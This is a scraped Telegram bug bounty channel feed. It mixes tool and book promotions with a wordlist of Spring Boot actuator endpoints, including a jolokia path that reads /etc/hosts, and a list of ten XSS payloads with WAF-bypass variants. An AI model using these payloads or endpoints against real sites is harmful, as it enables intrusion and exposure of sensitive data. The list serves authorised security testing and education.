Bug bounty Tips
Відкрити в Telegram
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Показати більше5 905
Підписники
+1924 години
+927 днів
+36930 день
Архів дописів
5 912
Let's leave that here.
Decide a day, and I will try to make a webinar and you guys can also join and let's hunt live on webinar for 1 - 2hrs
5 912
🚨 Depix 👉 It is a free and open-source tool used for image steganography, specifically for extracting hidden data from images.
🔗Download : https://github.com/spipm/Depix
#bugbounty #bugbountytips
5 912
🕵️♂️🔍 Ever wondered how your computer fetches web pages?
Let's take a fun trip to the "World Wide Library" and meet Wendy the Librarian! 📚✨
She'll show you how making a request for a book is just like your computer requesting a webpage.
Dive into this magical story and discover the secrets of request handling! Swipe through to become a web wizard! 🌐✨
.
.
.
.
✔️ Share It with Your Friends.
🔗 CHECKOUT THE LINK IN BIO
🔥 Don’t miss the HIGHLIGHTS
🤔 Any queries? Don’t hesitate to DM.
❤️ LIKE, COMMENT, SHARE and SAVE the post.
👉 Follow us for more cybersecurity tips and tricks!
🌐 Visit us at www.cipherops.xyz
📲 @cipherops.tech
https://www.instagram.com/p/C-ASeR-yRvP/?igsh=MTc4MmM1YmI2Ng==
5 912
I am looking for an admin who can post content and intaract anyone is here and anyone already running a channel also eligible. I will make him a admin but have some terms and conditions.
5 912
Check out this new vdp program for this week, give an update and let me know anyone working on this program atleast and final give a lot of reaction so that I can know that it is worth sharing things in this group
New VDP Program - https://www.sonova.com/.well-known/security.txt
5 912
#PacktPub | Bug Bounty from Scratch : A comprehensive guide to discovering vulnerabilities and succeeding in cybersecurity
Info : https://www.packtpub.com/en-us/product/bug-bounty-from-scratch-9781803239255
5 912
PowerShell for Penetration Testing.
Explore the capabilities of PowerShell for pentesters across multiple platforms by Dr. Andrew Blyth, 2024
5 912
😎Add this to your wordlist:
actuator/env
actuator/auditevents
actuator/beans
actuator/caches
actuator/configprops
actuator/health
actuator/heapdump
actuator/info
actuator/integrationgraph
actuator/configprops
actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/hosts
#bugbountytip #bugbountytips #bugbounty
5 912
🚀A Practical Guide to Starting Your Cybersecurity Career in India🚀
✈️Link- https://ko-fi.com/post/A-Practical-Guide-to-Starting-Your-Cybersecurity-C-L4L410XGKI
5 912
I have share a video on which operating system is better on instagram so do check it out guys
https://www.instagram.com/reel/C9ww22ry8Ub/?igsh=MzRlODBiNWFlZA==
5 912
🚀 Apepe - Mobile application pentesting🚀
🕵️ Apepe is a Python tool developed to help pentesters and red teamers to easily get information from the target app. This tool will extract basic informations as the package name, if the app is signed and the development language...
🧾 Source - github.com/oppsec/Apepe
5 912
🔖10 Juicy XSS payloads that you can use.
1️⃣. ?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >
hackerone.com/reports/2433634
2️⃣. ?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
hackerone.com/reports/846338
The payload finished open function calls from jQuery, executes an alert as POC and then finished the original script tag
3️⃣. <a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>
WAF / Cloudflare Bypass
4️⃣. ”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/> remove the underscores
hackerone.com/reports/484434
filtering using HTML entities for the alternation of <>, because I noticed that it's filtering the
5️⃣. <a href=[ ]" onmouseover=prompt(1)//">XYZ</a>
6️⃣. <script /*/>/*/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/*/</script /*/
7️⃣. <blink/ onmouseover=prompt(1)>OnMouseOver
Firefox & Opera
8️⃣. <svg> <foreignObject width="100%" height="100%"> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>
9️⃣. <script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";a.click();</script>
1️⃣🅾️. jaVasCript:/--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>"'alert(1)
🐱 github
💡You can check the group for more resources
#XSS #BugBounty #BugBountyTips
🔸🔸 Share & Support Us 🔸 🔸
✔️ Channel: @bugbounty_tech
👥 Group: @bugbounty_talks
Вже доступно! Дослідження Telegram за 2025 — головні інсайти року 
